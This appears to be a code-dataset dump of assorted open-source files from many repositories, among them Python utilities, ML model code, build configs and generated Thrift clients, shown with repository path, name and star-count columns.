max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
python/django/app/views.py
|
mattiapenati/web-frameworks
| 5,710 |
87665
|
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
def index(request):
return HttpResponse(status=200)
def get_user(request, id):
return HttpResponse(id)
@csrf_exempt
def create_user(request):
return HttpResponse(status=200)
|
baselines/EMNLP2019/general_inputter.py
|
ParikhKadam/knowledge-net
| 240 |
87718
|
"""Define inputters reading from TFRecord files."""
import tensorflow as tf
from opennmt.inputters.inputter import Inputter
from opennmt.utils import compat
import numpy as np
from collections import defaultdict
import yaml
class Feature:
def __init__(self, name, shape, where):
self.name = name
self.shape = shape
self.where = where
class RecordInputter(Inputter):
"""Inputter that reads a header file that discribes the tensors and shapes
"""
def __init__(self, dtype=tf.float32):
"""Initializes the parameters of the record inputter.
Args:
dtype: The values type.
"""
super(RecordInputter, self).__init__(dtype=dtype)
def initialize(self, metadata, asset_dir=None, asset_prefix=""):
config_file = metadata['config_file']
# read config file
self.input_features = []
self.has = defaultdict(bool)
with open(config_file, "r") as f:
config = yaml.safe_load(f)
for fi in config["features"]:
f = Feature(fi[0], fi[1], fi[2])
self.has[f.where] = True
self.input_features.append(f)
print(self.input_features)
def make_dataset(self, data_file, training=None):
return tf.data.TFRecordDataset(data_file)
def get_dataset_size(self, data_file):
return sum(1 for _ in compat.tf_compat(v1="python_io.tf_record_iterator")(data_file))
def get_receiver_tensors(self):
ret = {}
if self.has_word():
ret["numWords"] = tf.placeholder(tf.int32, shape=(None,), name="numWords")
for feature in self.input_features:
shape = list(map( lambda x: None if x < 0 else x, list(feature.shape)))
shape.insert(0, None) # batch size
ret[feature.name] = tf.placeholder(tf.float32, shape=tuple(shape), name=feature.name)
return ret
def make_features(self, element=None, features=None, training=None):
if features is None:
features = {}
if self.input_features[0].name in features:
return features
if element is None:
raise RuntimeError("make_features was called with None element")
tf_parse_example = compat.tf_compat(v2="io.parse_single_example", v1="parse_single_example")
tf_var_len_feature = compat.tf_compat(v2="io.VarLenFeature", v1="VarLenFeature")
featuresDict = {}
if self.has_word():
featuresDict["numWords"] = tf_var_len_feature(tf.int64)
for feature in self.input_features:
featuresDict[feature.name] = tf_var_len_feature(tf.float32)
example = tf_parse_example(element, features=featuresDict)
if self.has_word():
features["numWords"] = tf.cast(example["numWords"].values, tf.int32)[0]
for feature in self.input_features:
print(feature.name, feature.shape)
features[feature.name] = tf.reshape(example[feature.name].values, feature.shape)
print("features", features)
return features
def get_word(self, features, training=None):
to_concat = []
for feature in self.input_features:
if feature.where == "word":
to_concat.append(features[feature.name])
return tf.concat(to_concat, axis=-1)
def get_global(self, features, training=None):
to_concat = []
for feature in self.input_features:
if feature.where == "global":
to_concat.append(features[feature.name])
if len(to_concat) == 1:
return to_concat[0]
return tf.concat(to_concat, axis=-1)
def get_lm(self, features, training=None):
to_concat = []
for feature in self.input_features:
if feature.where == "lm":
to_concat.append(features[feature.name])
return tf.concat(to_concat, axis=-2)
def has_word(self):
return self.has["word"]
def has_lm(self):
return self.has["lm"]
def has_global(self):
return self.has["global"]
def get_length(self, features, training=None):
return features["numWords"] if "numWords" in features else 1
|
scripts/shared_qvm.py
|
karlosz/qvm
| 321 |
87729
|
#!/usr/bin/env python
### shared_qvm.py
###
### Author: <NAME>
###
### Copyright (c) 2017 Rigetti Computing
### This file shows a minimal example of how to use the --shared
### option with QVM from Python.
from __future__ import print_function
import posix_ipc as pos
import mmap
import ctypes
import numpy as np
import socket
import json
import sys
from pyquil.api import QVMConnection
from pyquil.quil import Program
from pyquil.gates import X
def query_length_offset(name):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect('/tmp/' + name)
s.sendall("?")
message, peer = s.recvfrom(4096)
length, offset = message.split(',')
return int(length), int(offset)
def retrieve_wavefunction(name):
length, offset = query_length_offset(name)
shm = pos.SharedMemory(name)
m = mmap.mmap(shm.fd, shm.size)
# get the pointer to what appear to be an array of bytes
ptr = ctypes.POINTER(ctypes.c_ubyte)(ctypes.c_void_p.from_buffer(m, offset))
# cast to array of complex double floats
ptr = ctypes.cast(ptr, np.ctypeslib.ndpointer(shape=(length,), dtype=np.complex128))
return np.ctypeslib.as_array(ptr)
# Example use of this interface.
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Syntax: shared_qvm.py <name>')
sys.exit(1)
name = sys.argv[1]
cxn = QVMConnection(sync_endpoint='http://127.0.0.1:5000')
wf = retrieve_wavefunction(name)
print("Initial wavefunction:")
print(wf)
print("Initializing to W state.")
wf[0b0000] = 0j
wf[0b0001] = (1+0j)/np.sqrt(4)
wf[0b0010] = (1+0j)/np.sqrt(4)
wf[0b0100] = (1+0j)/np.sqrt(4)
wf[0b1000] = (1+0j)/np.sqrt(4)
print(wf)
print("Evolving with X3X2X1X0 via QVM. Quil program is:")
p = Program().inst([X(q) for q in range(4)])
print(p)
cxn.run(p, [0])
print("Printing evolved state.")
for b in range(len(wf)):
if not np.isclose(wf[b], 0j):
print("{0:04b} => {1}".format(b, wf[b]))
|
python/np-linear-algebra.py
|
gajubadge11/HackerRank-1
| 340 |
87738
|
import numpy as np
n = int(input().strip())
array = np.array([[float(x) for x in input().strip().split()] for _ in range(n)], dtype = float)
print(np.linalg.det(array))
|
src/third_party/flac/flac.gyp
|
goochen/naiveproxy
| 2,151 |
87781
|
<gh_stars>1000+
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'libflac',
'product_name': 'flac',
'type': 'static_library',
'sources': [
'include/FLAC/all.h',
'include/FLAC/assert.h',
'include/FLAC/callback.h',
'include/FLAC/export.h',
'include/FLAC/format.h',
'include/FLAC/metadata.h',
'include/FLAC/ordinals.h',
'include/FLAC/stream_decoder.h',
'include/FLAC/stream_encoder.h',
'include/share/alloc.h',
'include/share/compat.h',
'include/share/endswap.h',
'include/share/private.h',
'src/libFLAC/alloc.c',
'src/libFLAC/bitmath.c',
'src/libFLAC/bitreader.c',
'src/libFLAC/bitwriter.c',
'src/libFLAC/cpu.c',
'src/libFLAC/crc.c',
'src/libFLAC/fixed.c',
'src/libFLAC/float.c',
'src/libFLAC/format.c',
'src/libFLAC/lpc.c',
'src/libFLAC/md5.c',
'src/libFLAC/memory.c',
'src/libFLAC/stream_decoder.c',
'src/libFLAC/stream_encoder.c',
'src/libFLAC/stream_encoder_framing.c',
'src/libFLAC/window.c',
'src/libFLAC/include/private/all.h',
'src/libFLAC/include/private/bitmath.h',
'src/libFLAC/include/private/bitreader.h',
'src/libFLAC/include/private/bitwriter.h',
'src/libFLAC/include/private/cpu.h',
'src/libFLAC/include/private/crc.h',
'src/libFLAC/include/private/fixed.h',
'src/libFLAC/include/private/float.h',
'src/libFLAC/include/private/format.h',
'src/libFLAC/include/private/lpc.h',
'src/libFLAC/include/private/macros.h',
'src/libFLAC/include/private/md5.h',
'src/libFLAC/include/private/memory.h',
'src/libFLAC/include/private/metadata.h',
'src/libFLAC/include/private/stream_encoder.h',
'src/libFLAC/include/private/stream_encoder_framing.h',
'src/libFLAC/include/private/window.h',
'src/libFLAC/include/protected/all.h',
'src/libFLAC/include/protected/stream_decoder.h',
'src/libFLAC/include/protected/stream_encoder.h',
],
'defines': [
'FLAC__NO_DLL',
'FLAC__OVERFLOW_DETECT',
'VERSION="1.3.1"',
'HAVE_LROUND',
],
'conditions': [
['OS=="win"', {
'sources': [
'include/share/win_utf8_io.h',
'src/share/win_utf8_io/win_utf8_io.c',
],
'defines!': [
'WIN32_LEAN_AND_MEAN', # win_utf8_io.c defines this itself.
],
'msvs_settings': {
'VCCLCompilerTool': {
'AdditionalOptions': [
'/wd4334', # 32-bit shift converted to 64 bits.
'/wd4267', # Converting from size_t to unsigned on 64-bit.
],
},
},
}, {
'defines': [
'HAVE_INTTYPES_H',
],
}],
],
'include_dirs': [
'include',
'src/libFLAC/include',
],
'direct_dependent_settings': {
'defines': [
'FLAC__NO_DLL',
],
},
'variables': {
'clang_warning_flags': [
# libflac converts between FLAC__StreamDecoderState and
# FLAC__StreamDecoderInitStatus a lot in stream_decoder.c.
'-Wno-conversion',
# libflac contains constants that are only used in certain
# compile-time cases, which triggers unused-const-variable warnings in
# other cases.
'-Wno-unused-const-variable',
],
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
tests/server_test.py
|
Adrijaned/weechat-matrix
| 773 |
87800
|
from matrix.server import MatrixServer
from matrix._weechat import MockConfig
import matrix.globals as G
G.CONFIG = MockConfig()
class TestClass(object):
def test_address_parsing(self):
homeserver = MatrixServer._parse_url("example.org", 8080)
assert homeserver.hostname == "example.org"
assert homeserver.geturl() == "https://example.org:8080"
homeserver = MatrixServer._parse_url("example.org/_matrix", 80)
assert homeserver.hostname == "example.org"
assert homeserver.geturl() == "https://example.org:80/_matrix"
homeserver = MatrixServer._parse_url(
"https://example.org/_matrix", 80
)
assert homeserver.hostname == "example.org"
assert homeserver.geturl() == "https://example.org:80/_matrix"
|
esphome/components/pmsa003i/sensor.py
|
OttoWinter/esphomeyaml
| 249 |
87821
|
<gh_stars>100-1000
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import i2c, sensor
from esphome.const import (
CONF_ID,
CONF_PM_1_0,
CONF_PM_2_5,
CONF_PM_10_0,
CONF_PMC_0_5,
CONF_PMC_1_0,
CONF_PMC_2_5,
CONF_PMC_10_0,
UNIT_MICROGRAMS_PER_CUBIC_METER,
ICON_CHEMICAL_WEAPON,
ICON_COUNTER,
DEVICE_CLASS_PM1,
DEVICE_CLASS_PM10,
DEVICE_CLASS_PM25,
STATE_CLASS_MEASUREMENT,
)
CODEOWNERS = ["@sjtrny"]
DEPENDENCIES = ["i2c"]
pmsa003i_ns = cg.esphome_ns.namespace("pmsa003i")
PMSA003IComponent = pmsa003i_ns.class_(
"PMSA003IComponent", cg.PollingComponent, i2c.I2CDevice
)
CONF_STANDARD_UNITS = "standard_units"
UNIT_COUNTS_PER_100ML = "#/0.1L"
CONF_PMC_0_3 = "pmc_0_3"
CONF_PMC_5_0 = "pmc_5_0"
CONFIG_SCHEMA = (
cv.Schema(
{
cv.GenerateID(): cv.declare_id(PMSA003IComponent),
cv.Optional(CONF_STANDARD_UNITS, default=True): cv.boolean,
cv.Optional(CONF_PM_1_0): sensor.sensor_schema(
unit_of_measurement=UNIT_MICROGRAMS_PER_CUBIC_METER,
icon=ICON_CHEMICAL_WEAPON,
accuracy_decimals=2,
device_class=DEVICE_CLASS_PM1,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PM_2_5): sensor.sensor_schema(
unit_of_measurement=UNIT_MICROGRAMS_PER_CUBIC_METER,
icon=ICON_CHEMICAL_WEAPON,
accuracy_decimals=2,
device_class=DEVICE_CLASS_PM25,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PM_10_0): sensor.sensor_schema(
unit_of_measurement=UNIT_MICROGRAMS_PER_CUBIC_METER,
icon=ICON_CHEMICAL_WEAPON,
accuracy_decimals=2,
device_class=DEVICE_CLASS_PM10,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_0_3): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_0_5): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_1_0): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_2_5): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_5_0): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_10_0): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
}
)
.extend(cv.polling_component_schema("60s"))
.extend(i2c.i2c_device_schema(0x12))
)
TYPES = {
CONF_PM_1_0: "set_pm_1_0_sensor",
CONF_PM_2_5: "set_pm_2_5_sensor",
CONF_PM_10_0: "set_pm_10_0_sensor",
CONF_PMC_0_3: "set_pmc_0_3_sensor",
CONF_PMC_0_5: "set_pmc_0_5_sensor",
CONF_PMC_1_0: "set_pmc_1_0_sensor",
CONF_PMC_2_5: "set_pmc_2_5_sensor",
CONF_PMC_5_0: "set_pmc_5_0_sensor",
CONF_PMC_10_0: "set_pmc_10_0_sensor",
}
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
await i2c.register_i2c_device(var, config)
cg.add(var.set_standard_units(config[CONF_STANDARD_UNITS]))
for key, funcName in TYPES.items():
if key in config:
sens = await sensor.new_sensor(config[key])
cg.add(getattr(var, funcName)(sens))
|
pudzu/sandbox/tureen.py
|
Udzu/pudzu
| 119 |
87844
|
import itertools
import operator
import re
import bs4
from pudzu.utils import *
# Various utilities for BeautifulSoup
# helper functions since: (a) bs4 tags need to be compared with is, not eq; (b) they're iterable
def remove_duplicate_tags(l):
"""Remove duplicate tags from a list (using object identity rather than equality)"""
return remove_duplicates(l, key=id)
def non_bs4_iterable(v):
"""Whether an object is a non-bs4 iterable."""
return non_string_iterable(v) and not hasattr(v, "find_all")
def make_bs4_iterable(v):
"""Return a non-bs4 iterable from an object, wrapping it in a tuple if needed."""
return v if non_bs4_iterable(v) else (v,)
# pretty-printing tags
def print_tags(tags, attr=None):
"""Print one or more tags, excluding any nested content."""
for tag in make_bs4_iterable(tags):
if attr is not None:
print(tag.attrs.get(attr, ""))
elif hasattr(tag, "attr"):
attrs = " ".join('{}="{}"'.format(k, " ".join(v) if non_string_iterable(v) else v) for k, v in sorted(tag.attrs.items()))
print("<{}{}{}>".format(tag.name, "" if len(tag.attrs) == 0 else " ", attrs))
else:
print(tag)
def print_path(tag):
"""Print the path from the root down to a tag."""
print_tags(list(itertools.chain([tag], tag.parents))[-2::-1])
pt = print_tags
pp = print_path
# filtering
def re_exclude(pattern):
"""Negated regular expression filter."""
pattern = re.compile(pattern)
return lambda v: v and not re.search(pattern, v)
def is_parent(t, s):
"""Whether t is s's parent."""
return t is s.parent
def is_child(t, s):
"""Whether t is s's child."""
return s is t.parent
def is_ancestor(t, s):
"""Whether t is an ancestor of s."""
return is_in(t, s.parents)
def is_descendent(t, s):
"""Whether t is a descendent of s."""
return is_in(s, t.parents)
def is_after(t, s):
"""Whether t occurs after s."""
return is_in(t, s.next_elements)
def is_before(t, s):
"""Whether t occurs before s."""
return is_in(s, t.next_elements)
def exclude_tags(tags, excluded, relation=operator.is_):
"""Filter out tags that are related to at least one of the excluded set."""
return [t for t in make_bs4_iterable(tags) if not any(relation(t, s) for s in make_bs4_iterable(excluded))]
def restrict_tags(tags, included, relation=operator.is_):
"""Restrict to tags that are related to at least one of the included set."""
return [t for t in make_bs4_iterable(tags) if any(relation(t, s) for s in make_bs4_iterable(included))]
# finding tags by chaining
def curry_method(method):
def fn(*args, **kwargs):
return lambda o: method(o, *args, **kwargs)
return fn
all_ = curry_method(bs4.element.Tag.find_all)
next_ = curry_method(bs4.element.Tag.find_all_next)
prev_ = curry_method(bs4.element.Tag.find_all_previous)
parents_ = curry_method(bs4.element.Tag.find_parents)
next_siblings_ = curry_method(bs4.element.Tag.find_next_siblings)
prev_siblings_ = curry_method(bs4.element.Tag.find_previous_siblings)
select_ = curry_method(bs4.element.Tag.select)
exclude_ = curry_method(exclude_tags)
restrict_ = curry_method(restrict_tags)
def find_tags(tags, *fns):
"""Apply a chain sequence of find methods to a collection of tags. Result may contain duplicates."""
ts = make_bs4_iterable(tags)
for fn in fns:
if not callable(fn):
fn = all_(fn)
ts = [s for t in ts for s in make_bs4_iterable(fn(t))]
return ts
def find_tag(tags, *fns):
"""Same as find_tags but returns the first result only (or None if there are none)."""
return first(find_tags(tags, *fns))
|
Python/SingleNumber.py
|
TonnyL/Windary
| 205 |
87846
|
<reponame>TonnyL/Windary
# Given an array of integers, every element appears twice except for one. Find that single one.
#
# Note:
# Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
#
# Python, Python3 all accepted.
class SingleNumber:
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
s = 0
if nums is None:
return s
for i in nums:
s ^= i
return s
|
src/head_detector_vgg16.py
|
bill-lin/FCHD-Fully-Convolutional-Head-Detector
| 648 |
87850
|
<gh_stars>100-1000
import torch as t
from torch import nn
from torchvision.models import vgg16
from src.region_proposal_network import RegionProposalNetwork
from src.head_detector import Head_Detector
from src.config import opt
def decom_vgg16():
""" Load the default PyTorch model or the pre-trained caffe model.
Freeze the weights of some layers of the network and train the rest
of the features.
"""
if opt.caffe_pretrain:
# Load the caffe model
model = vgg16(pretrained=False)
model.load_state_dict(t.load(opt.caffe_pretrain_path))
else:
# Load the default model in PyTorch
model = vgg16(pretrained=True)
features = list(model.features)[:30]
# Freeze some of the layers.
# for layer in features[:10]:
# for p in layer.parameters():
# p.requires_grad = False
return nn.Sequential(*features)
class Head_Detector_VGG16(Head_Detector):
""" Head detector based on VGG16 model.
Have two components:
1) Fixed feature extractor from the conv_5 layer of the VGG16
2) A region proposal network on the top of the extractor.
"""
feat_stride = 16
def __init__(self, ratios=[0.5, 1, 2], anchor_scales=[8,16,32]):
extractor = decom_vgg16()
rpn = RegionProposalNetwork(
512, 512,
ratios=ratios,
anchor_scales=anchor_scales,
feat_stride=self.feat_stride
)
super(Head_Detector_VGG16, self).__init__(
extractor,
rpn
)
pass
|
rman_translators/rman_alembic_translator.py
|
fxjeane/RenderManForBlender
| 312 |
87852
|
from .rman_translator import RmanTranslator
from ..rman_sg_nodes.rman_sg_alembic import RmanSgAlembic
from ..rfb_utils import transform_utils
from ..rfb_utils import string_utils
from ..rfb_logger import rfb_log
class RmanAlembicTranslator(RmanTranslator):
def __init__(self, rman_scene):
super().__init__(rman_scene)
self.bl_type = 'ALEMBIC'
def export(self, ob, db_name):
sg_node = self.rman_scene.sg_scene.CreateProcedural(db_name)
sg_node.Define("DynamicLoad", None)
rman_sg_alembic = RmanSgAlembic(self.rman_scene, sg_node, db_name)
return rman_sg_alembic
def export_deform_sample(self, rman_sg_alembic, ob, time_sample):
pass
def update(self, ob, rman_sg_alembic):
rm = ob.renderman
abc_filepath = string_utils.expand_string(rm.abc_filepath)
bounds = (-100000, 100000, -100000, 100000, -100000, 100000 )
primvar = rman_sg_alembic.sg_node.GetPrimVars()
primvar.SetString(self.rman_scene.rman.Tokens.Rix.k_dsoname, 'AlembicProcPrim')
primvar.SetFloatArray(self.rman_scene.rman.Tokens.Rix.k_bound, bounds, 6)
shutter_interval = self.rman_scene.bl_scene.renderman.shutter_angle / 360.0
shutter_open, shutter_close = 0, shutter_interval
abc_frame = rm.abc_frame
if rm.abc_use_scene_frame:
rman_sg_alembic.is_frame_sensitive = True
abc_frame = float(self.rman_scene.bl_frame_current)
else:
rman_sg_alembic.is_frame_sensitive = False
abc_args = "-filename %s" % abc_filepath
abc_args += " -frame %f" % abc_frame
abc_args += " -fps %f" % rm.abc_fps
abc_args += " -shutteropen %f" % shutter_open
abc_args += " -shutterclose %f" % shutter_close
abc_args += " -velocityscale %f" % rm.abc_velocityScale
abc_args += " -ccw"
primvar.SetString(self.rman_scene.rman.Tokens.Rix.k_data, abc_args)
rman_sg_alembic.sg_node.SetPrimVars(primvar)
|
model/sep_conv.py
|
leoriohope/RandWireNN
| 757 |
87865
|
<reponame>leoriohope/RandWireNN
import torch
import torch.nn as nn
class SeparableConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0,
dilation=1, bias=False):
super(SeparableConv2d,self).__init__()
self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size, stride, padding,
dilation, groups=in_channels, bias=bias)
self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)
def forward(self,x):
x = self.conv1(x)
x = self.pointwise(x)
return x
|
thrift/compiler/test/fixtures/namespace/gen-py3lite/my/namespacing/extend/test/extend/lite_clients.py
|
killight98/fbthrift
| 2,112 |
87872
|
#
# Autogenerated by Thrift
#
# DO NOT EDIT
# @generated
#
import typing as _typing
import folly.iobuf as _fbthrift_iobuf
from thrift.py3lite.client import (
AsyncClient as _fbthrift_py3lite_AsyncClient,
SyncClient as _fbthrift_py3lite_SyncClient,
Client as _fbthrift_py3lite_Client,
)
import thrift.py3lite.exceptions as _fbthrift_py3lite_exceptions
import thrift.py3lite.types as _fbthrift_py3lite_types
import py3lite_module_root.my.namespacing.extend.test.extend.lite_types
import py3lite_module_root.my.namespacing.test.hsmodule.lite_types
import py3lite_module_root.my.namespacing.test.hsmodule.lite_clients
class ExtendTestService(_fbthrift_py3lite_Client["ExtendTestService.Async", "ExtendTestService.Sync"]):
class Async(py3lite_module_root.my.namespacing.test.hsmodule.lite_clients.HsTestService.Async):
async def check(
self,
struct1: py3lite_module_root.my.namespacing.test.hsmodule.lite_types.HsFoo
) -> bool:
resp = await self._send_request(
"ExtendTestService",
"check",
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_args(
struct1=struct1,),
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_result,
)
# shortcut to success path for non-void returns
if resp.success is not None:
return resp.success
raise _fbthrift_py3lite_exceptions.ApplicationError(
_fbthrift_py3lite_exceptions.ApplicationErrorType.MISSING_RESULT,
"Empty Response",
)
class Sync(py3lite_module_root.my.namespacing.test.hsmodule.lite_clients.HsTestService.Sync):
def check(
self,
struct1: py3lite_module_root.my.namespacing.test.hsmodule.lite_types.HsFoo
) -> bool:
resp = self._send_request(
"ExtendTestService",
"check",
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_args(
struct1=struct1,),
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_result,
)
# shortcut to success path for non-void returns
if resp.success is not None:
return resp.success
raise _fbthrift_py3lite_exceptions.ApplicationError(
_fbthrift_py3lite_exceptions.ApplicationErrorType.MISSING_RESULT,
"Empty Response",
)
|
plugins/k8s/test/test_args.py
|
MrMarvin/cloudkeeper
| 316 |
87887
|
from resotolib.args import get_arg_parser, ArgumentParser
from resoto_plugin_k8s import KubernetesCollectorPlugin
def test_args():
arg_parser = get_arg_parser()
KubernetesCollectorPlugin.add_args(arg_parser)
arg_parser.parse_args()
assert len(ArgumentParser.args.k8s_context) == 0
assert ArgumentParser.args.k8s_config is None
assert len(ArgumentParser.args.k8s_cluster) == 0
assert len(ArgumentParser.args.k8s_apiserver) == 0
assert len(ArgumentParser.args.k8s_token) == 0
assert len(ArgumentParser.args.k8s_cacert) == 0
assert len(ArgumentParser.args.k8s_collect) == 0
assert len(ArgumentParser.args.k8s_no_collect) == 0
assert ArgumentParser.args.k8s_pool_size == 5
assert ArgumentParser.args.k8s_fork is False
|
vut/lib/python3.8/site-packages/pipenv/vendor/passa/cli/_base.py
|
dan-mutua/djangowk1
| 6,263 |
87895
|
# -*- coding=utf-8 -*-
from __future__ import absolute_import, unicode_literals
import argparse
import os
import sys
from .options import project
class BaseCommand(object):
"""A CLI command.
"""
name = None
description = None
default_arguments = [project]
arguments = []
def __init__(self, parser=None):
if not parser:
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description="Base argument parser for passa"
)
self.parser = parser
self.add_arguments()
@classmethod
def build_parser(cls):
parser = argparse.ArgumentParser(
prog="passa {}".format(cls.name),
description=cls.description,
)
return cls(parser)
@classmethod
def run_parser(cls):
parser = cls.build_parser()
parser()
def __call__(self, argv=None):
options = self.parser.parse_args(argv)
result = self.main(options)
if result is not None:
sys.exit(result)
def add_default_arguments(self):
for arg in self.default_arguments:
arg.add_to_parser(self.parser)
def add_arguments(self):
self.add_default_arguments()
for arg in self.arguments:
arg.add_to_parser(self.parser)
def main(self, options):
return self.run(options)
def run(self, options):
raise NotImplementedError
|
utils.py
|
dendisuhubdy/ALAE
| 3,477 |
87915
|
# Copyright 2019-2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from torch import nn
import torch
import threading
import hashlib
import pickle
import os
class cache:
def __init__(self, function):
self.function = function
self.pickle_name = self.function.__name__
def __call__(self, *args, **kwargs):
m = hashlib.sha256()
m.update(pickle.dumps((self.function.__name__, args, frozenset(kwargs.items()))))
output_path = os.path.join('.cache', "%s_%s" % (m.hexdigest(), self.pickle_name))
try:
with open(output_path, 'rb') as f:
data = pickle.load(f)
except (FileNotFoundError, pickle.PickleError):
data = self.function(*args, **kwargs)
os.makedirs(os.path.dirname(output_path), exist_ok=True)
with open(output_path, 'wb') as f:
pickle.dump(data, f)
return data
def save_model(x, name):
if isinstance(x, nn.DataParallel):
torch.save(x.module.state_dict(), name)
else:
torch.save(x.state_dict(), name)
class AsyncCall(object):
def __init__(self, fnc, callback=None):
self.Callable = fnc
self.Callback = callback
self.result = None
def __call__(self, *args, **kwargs):
self.Thread = threading.Thread(target=self.run, name=self.Callable.__name__, args=args, kwargs=kwargs)
self.Thread.start()
return self
def wait(self, timeout=None):
self.Thread.join(timeout)
if self.Thread.isAlive():
raise TimeoutError
else:
return self.result
def run(self, *args, **kwargs):
self.result = self.Callable(*args, **kwargs)
if self.Callback:
self.Callback(self.result)
class AsyncMethod(object):
def __init__(self, fnc, callback=None):
self.Callable = fnc
self.Callback = callback
def __call__(self, *args, **kwargs):
return AsyncCall(self.Callable, self.Callback)(*args, **kwargs)
def async_func(fnc=None, callback=None):
if fnc is None:
def add_async_callback(f):
return AsyncMethod(f, callback)
return add_async_callback
else:
return AsyncMethod(fnc, callback)
class Registry(dict):
def __init__(self, *args, **kwargs):
super(Registry, self).__init__(*args, **kwargs)
def register(self, module_name):
def register_fn(module):
assert module_name not in self
self[module_name] = module
return module
return register_fn
|
tueplots/axes.py
|
not-a-feature/tueplots
| 110 |
87924
|
<reponame>not-a-feature/tueplots
"""Axes behaviour."""
def lines(
*,
base_width=0.5,
line_base_ratio=2.0,
tick_major_base_ratio=1.0,
tick_minor_base_ratio=0.5,
tick_size_width_ratio=3.0,
tick_major_size_min=3.0,
tick_minor_size_min=2.0,
axisbelow=True,
):
"""Adjust linewidth(s) according to a base width."""
tick_major_width = tick_major_base_ratio * base_width
tick_minor_width = tick_minor_base_ratio * base_width
tick_major_size = max(tick_major_size_min, tick_size_width_ratio * tick_major_width)
tick_minor_size = max(tick_minor_size_min, tick_size_width_ratio * tick_minor_width)
return {
# Set the line-widths appropriately (including the grid)
"axes.linewidth": base_width,
"lines.linewidth": line_base_ratio * base_width,
"xtick.major.width": tick_major_width,
"ytick.major.width": tick_major_width,
"xtick.minor.width": tick_minor_width,
"ytick.minor.width": tick_minor_width,
"xtick.major.size": tick_major_size,
"ytick.major.size": tick_major_size,
"xtick.minor.size": tick_minor_size,
"ytick.minor.size": tick_minor_size,
"grid.linewidth": base_width,
# Legend frame linewidth
"patch.linewidth": base_width,
"legend.edgecolor": "inherit", # inherit color from axes. passing 'color' leads to awkward future warnings.
# Control the zorder of the ticks and gridlines
# This is somewhat out of place in this function, but creating a new function
# seems a bit unnecessary here... suggestions welcome!
"axes.axisbelow": axisbelow,
}
def grid(*, grid_alpha=0.2, grid_linestyle="solid"):
"""Adjust the grid-style."""
return {
# Update the linestyle of the grid
# (it shares a color with the frame, and needs to be distinguishable)
"grid.linestyle": grid_linestyle,
"grid.alpha": grid_alpha,
}
def legend(*, shadow=False, frameon=True, fancybox=False):
"""Adjust the legend-style."""
return {
"legend.shadow": shadow,
"legend.frameon": frameon,
"legend.fancybox": fancybox,
}
def color(*, base="black", face="none"):
"""Adjust the axes' color."""
return {
"text.color": base,
"axes.edgecolor": base,
"axes.labelcolor": base,
"xtick.color": base,
"ytick.color": base,
"grid.color": base,
"axes.facecolor": face,
}
def spines(*, left=True, right=True, top=True, bottom=True):
"""Adjust the visibility of the axes' spines."""
return {
"axes.spines.left": left,
"axes.spines.right": right,
"axes.spines.top": top,
"axes.spines.bottom": bottom,
}
def tick_direction(*, x="inout", y="inout"):
"""Adjust the tick direction."""
return {
"xtick.direction": x,
"ytick.direction": y,
}
|
dm_alchemy/event_tracker.py
|
locross93/dm_alchemy
| 182 |
87948
|
# Lint as: python3
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
